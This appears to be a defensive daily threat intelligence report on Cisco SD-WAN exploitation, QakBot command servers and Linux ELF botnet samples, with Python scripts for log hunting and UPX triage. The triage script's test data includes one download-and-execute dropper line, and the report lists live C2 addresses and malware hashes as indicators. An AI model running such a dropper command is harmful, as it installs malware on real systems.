Daily Threat Intelligence Report: 2026-05-14
Today's threat landscape is dominated by three converging threats: active QakBot and Emotet C2 infrastructure confirmed by Feodotracker on US, UK and Japanese hosting providers; active exploitation of CVE-2026-20182 (Cisco Catalyst SD-WAN authentication bypass), tracked by AlienVault OTX and CISA KEV with 33 confirmed IOCs attributed to threat actor UAT-8616; and a surge in Linux ELF malware distribution, including Mirai botnet samples and Wraith-tagged payloads, observed across MalwareBazaar and URLhaus malware download infrastructure. Immediate actions: block the four QakBot C2 IPs listed below at the perimeter and hunt historical network logs for prior connections to them; apply Cisco SD-WAN patches per CISA Emergency Directive 26-03, or isolate controllers that cannot be patched; and hunt for UPX-packed ELF executions on Linux endpoints. CISA KEV also lists four further vulnerabilities requiring immediate patching: Palo Alto PAN-OS RCE (CVE-2026-0300), Ivanti EPMM RCE (CVE-2026-6973), Microsoft Exchange XSS (CVE-2026-42897) and BerriAI LiteLLM SQL injection (CVE-2026-42208).
Active Exploitation of Cisco Catalyst SD-WAN Authentication Bypass (CVE-2026-20182) by UAT-8616
Severity: CRITICAL | Actor: UAT-8616
Threat actor UAT-8616 is actively exploiting CVE-2026-20182, a critical authentication bypass in Cisco Catalyst SD-WAN Controller and Manager that lets an unauthenticated remote attacker obtain full administrative privileges. The campaign is confirmed by AlienVault OTX with 33 associated IOCs and corroborated by CISA's Known Exploited Vulnerabilities catalogue, which carries an active Emergency Directive (ED 26-03). Successful exploitation gives the attacker control of the SD-WAN management plane and therefore of the fabric itself: traffic can be redirected or intercepted, persistent backdoors installed on controllers, and the overlay used to pivot into the branch and data-center networks it connects. CISA mandates remediation per ED 26-03 and has published Hunt and Hardening Guidance for Cisco SD-WAN devices. Organizations that cannot patch immediately must assess exposure and consider isolating affected controllers; those whose Manager or Controller interfaces were reachable from untrusted networks during the exploitation window should complete the hunt guidance before concluding they were not affected, since the bypass leaves no failed-authentication trail to alert on.
QakBot Banking Trojan C2 Infrastructure Active Across Three Countries: Imminent Financial Sector Risk
Severity: HIGH | Actor: TA505 (historical association)
Feodotracker has confirmed four active QakBot command-and-control servers across three countries: US (50.16.16.211, 34.204.119.63), UK (178.62.3.223) and Japan (27.133.154.218), indicating a geographically distributed C2 architecture actively supporting live QakBot infections. QakBot (also known as QBot or Pinkslipbot) is a banking trojan historically linked in some reporting to TA505 operations; it is known for credential theft and lateral movement and has served as a precursor loader for ransomware deployments including Conti and Black Basta. The multi-country hosting pattern is consistent with the use of disposable rented or compromised hosting to evade geo-based blocking and keep the botnet reachable when individual nodes are taken down. Organizations with active infections may be at imminent risk of credential exfiltration and ransomware pre-positioning. Block the four addresses at the perimeter and hunt retroactively across 90 days of firewall, proxy and DNS logs; match on the exact IP rather than a substring, and include denied connections as well as allowed ones, because a blocked beacon attempt still identifies an infected host.
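The retroactive hunt and perimeter block described above, as an added example that is not part of the Feodotracker feed or of this report's own tooling. It matches constructed firewall log lines (a hypothetical key=value export; real formats differ) against the four C2 addresses quoted above, parses each address with the standard library so a longer address containing a C2 IP as a substring is not counted as a hit, lists the internal hosts that successfully reached a C2, and emits iptables rules to drop further outbound traffic.

```python
import ipaddress
import re

# The four QakBot C2 addresses quoted from the Feodotracker section above.
QAKBOT_C2 = {
    "50.16.16.211": "US",
    "34.204.119.63": "US",
    "178.62.3.223": "UK",
    "27.133.154.218": "JP",
}

# Constructed sample log lines (hypothetical format, not a real export). Line 3 carries
# an address that contains a C2 IP as a prefix; a naive grep would flag it, exact
# parsing does not. Line 5 is a denied beacon attempt, still evidence of infection.
SAMPLE_LOGS = """\
2026-05-13T08:14:02Z action=allow src=10.20.4.17 dst=50.16.16.211 dport=443 proto=tcp
2026-05-13T08:14:09Z action=allow src=10.20.4.17 dst=142.250.74.46 dport=443 proto=tcp
2026-05-13T09:01:44Z action=allow src=10.20.9.3 dst=178.62.3.2230 dport=443 proto=tcp
2026-05-14T02:31:10Z action=allow src=10.20.4.17 dst=27.133.154.218 dport=995 proto=tcp
2026-05-14T02:31:11Z action=deny src=10.20.7.88 dst=34.204.119.63 dport=2222 proto=tcp
"""

LINE_RE = re.compile(r"^(?P<ts>\S+)\s+(?P<kv>.*)$")


def parse_line(line):
    """Split one key=value log line into a dict; return None for malformed lines."""
    m = LINE_RE.match(line.strip())
    if not m:
        return None
    fields = {"ts": m.group("ts")}
    for tok in m.group("kv").split():
        if "=" in tok:
            k, v = tok.split("=", 1)
            fields[k] = v
    return fields


def hunt(log_text, iocs=QAKBOT_C2):
    """Return one hit dict per line whose destination is a C2 address."""
    hits = []
    for line in log_text.splitlines():
        f = parse_line(line)
        if not f or "dst" not in f:
            continue
        try:
            dst = str(ipaddress.ip_address(f["dst"]))  # rejects 178.62.3.2230 (octet > 255)
        except ValueError:
            continue
        if dst in iocs:
            hits.append({"ts": f["ts"], "host": f.get("src"), "c2": dst,
                         "country": iocs[dst], "dport": f.get("dport"),
                         "action": f.get("action")})
    return hits


def infected_hosts(hits):
    """Internal sources with at least one allowed connection to a C2: isolate these first."""
    return sorted({h["host"] for h in hits if h["action"] == "allow"})


def block_rules(iocs=QAKBOT_C2):
    """iptables commands dropping outbound traffic to each C2 (one of many rule formats)."""
    return [f"iptables -A OUTPUT -d {ip}/32 -j DROP"
            for ip in sorted(iocs, key=ipaddress.ip_address)]


if __name__ == "__main__":
    found = hunt(SAMPLE_LOGS)
    for h in found:
        print(h)
    print("hosts to isolate:", infected_hosts(found))
    print("\n".join(block_rules()))
```

On the constructed input the hunt returns three hits (two allowed, one denied), one host to isolate, and four block rules. Hosts that appear only in denied hits still warrant triage, since the denial means the beacon was attempted.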
Coordinated Linux ELF Botnet Recruitment Campaign: Mirai, Wraith, and UPX-Packed Malware Surge via Malware Download Infrastructure
Severity: MEDIUM | Actor: Unknown
MalwareBazaar has identified a cluster of nine Linux ELF binaries submitted within the last 24 hours, the majority UPX-packed, alongside two samples tagged with the 'wraith' stealer designation and one confirmed Mirai botnet sample (cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9). They are being distributed via URLhaus-confirmed malware download infrastructure on non-standard high-numbered TCP ports (33129, 48114, 48707, 54809, 32782, 35600) from IP addresses geolocated to China, Pakistan and Australia, consistent with compromised IoT devices and home routers being used as distribution nodes. The Wraith-tagged ELF samples (5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219, e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45, aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8) indicate a potential Go-based stealer component alongside the botnet recruitment activity, suggesting a dual-purpose campaign targeting both Linux server compromise and credential theft. When hunting, treat UPX packing as a triage signal rather than a verdict: many legitimate embedded and IoT binaries ship UPX-packed, so pivot on the SHA256 hashes above, the download ports, and execution from world-writable paths before escalating. Separately, the GitHub/stamparm maltrail project updated its ClearFake and OSX Atomic trails on the same day; those families share no indicators with this ELF cluster and are noted only for cross-platform awareness.
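The endpoint hunt for UPX-packed ELF binaries called for above, as an added example that is not part of MalwareBazaar, URLhaus or this report's own tooling. It parses the ELF identification and header fields (class, endianness, type, machine), looks for the UPX header magic and for a missing section header table (UPX strips it), and checks the file hash against the four SHA256 values quoted in this section. The three sample files are constructed header-only images, not real malware, so they exercise the packer checks but cannot produce a hash match.

```python
import hashlib
import struct

# SHA256 values quoted from the MalwareBazaar section above.
KNOWN_BAD_SHA256 = {
    "cf3d2fc280979eca3e83eb37e9eaacaa9029b83e315840ba89892a0a08ebd1e9": "Mirai",
    "5e9747bbc50448329ec19615861b53c11398ccd171c4c7e5c227e0c1d73fb219": "wraith",
    "e98b8422076992dd1ee7a6ee4a7ca71b08004d8a80104186ad01490d5eba7e45": "wraith",
    "aef8c86b9a3d3d4392641868a17670c82ae136fdc9767277fbf81fdbeb566ac8": "wraith",
}

ELF_MAGIC = b"\x7fELF"
UPX_MARKER = b"UPX!"  # UPX packer header magic (l_magic), also present in the trailer
E_MACHINE = {0x03: "x86", 0x08: "MIPS", 0x28: "ARM", 0x3e: "x86-64", 0xb7: "AArch64"}


def parse_elf_header(data):
    """Return class, endianness, type and machine from the ELF header, or None if not ELF."""
    if len(data) < 20 or data[:4] != ELF_MAGIC:
        return None
    ei_class, ei_data = data[4], data[5]  # 1/2 = 32/64-bit; 1/2 = little/big-endian
    if ei_class not in (1, 2) or ei_data not in (1, 2):
        return None
    endian = "<" if ei_data == 1 else ">"
    e_type, e_machine = struct.unpack_from(endian + "HH", data, 16)
    return {"bits": 32 if ei_class == 1 else 64,
            "endian": "little" if ei_data == 1 else "big",
            "type": {2: "EXEC", 3: "DYN"}.get(e_type, hex(e_type)),
            "machine": E_MACHINE.get(e_machine, hex(e_machine))}


def section_header_count(data, hdr):
    """e_shnum sits at 0x30 in ELF32 and 0x3c in ELF64; UPX-packed files have 0 here."""
    off = 0x30 if hdr["bits"] == 32 else 0x3c
    if len(data) < off + 2:
        return None
    return struct.unpack_from(("<" if hdr["endian"] == "little" else ">") + "H", data, off)[0]


def triage(data):
    """Classify one file image: hash match, ELF header facts, UPX marker, stripped sections."""
    sha = hashlib.sha256(data).hexdigest()
    hdr = parse_elf_header(data)
    return {"sha256": sha,
            "known_bad": KNOWN_BAD_SHA256.get(sha),
            "elf": hdr,
            "upx_packed": hdr is not None and UPX_MARKER in data,
            "no_section_headers": hdr is not None and section_header_count(data, hdr) == 0}


def make_elf_header(bits, endian, e_type, e_machine, shnum):
    """Build a header-only ELF image for testing (constructed data, not a runnable binary)."""
    e = "<" if endian == "little" else ">"
    ident = ELF_MAGIC + bytes([1 if bits == 32 else 2, 1 if endian == "little" else 2, 1]) + b"\x00" * 9
    if bits == 32:
        body = struct.pack(e + "HHIIIIIHHHHHH", e_type, e_machine, 1, 0x8000, 52, 0, 0, 52, 32, 1, 40, shnum, 0)
    else:
        body = struct.pack(e + "HHIQQQIHHHHHH", e_type, e_machine, 1, 0x401000, 64, 0, 0, 64, 56, 1, 64, shnum, 0)
    return ident + body


# Constructed samples: a UPX-style ARM image with its section table stripped, a clean
# x86-64 image, and a downloader script using one of the ports listed above with a
# documentation-range IP (198.51.100.7) standing in for a real distribution node.
SAMPLES = {
    "arm_packed.elf": make_elf_header(32, "little", 2, 0x28, 0) + b"\x00" * 12 + UPX_MARKER + b"\x0d\x09\x0c\x00" + b"\x00" * 40,
    "clean_x86_64.elf": make_elf_header(64, "little", 2, 0x3e, 5) + b"\x00" * 64,
    "dropper.sh": b"#!/bin/sh\ncd /tmp; wget http://198.51.100.7:48114/arm7 -O x; chmod +x x; ./x\n",
}


def scan(samples):
    """Triage every sample and return the names worth escalating."""
    results = {name: triage(data) for name, data in samples.items()}
    flagged = sorted(n for n, r in results.items() if r["known_bad"] or r["upx_packed"])
    return results, flagged


if __name__ == "__main__":
    results, flagged = scan(SAMPLES)
    for name, r in results.items():
        print(name, r["elf"], "upx" if r["upx_packed"] else "", r["known_bad"] or "")
    print("escalate:", flagged)
```

Only the ARM image is flagged: it carries the UPX magic and has e_shnum of zero. The clean image parses as x86-64 with five section headers, and the script is not ELF at all; in a real hunt that script's URL would be matched against the URLhaus port list rather than the packer checks.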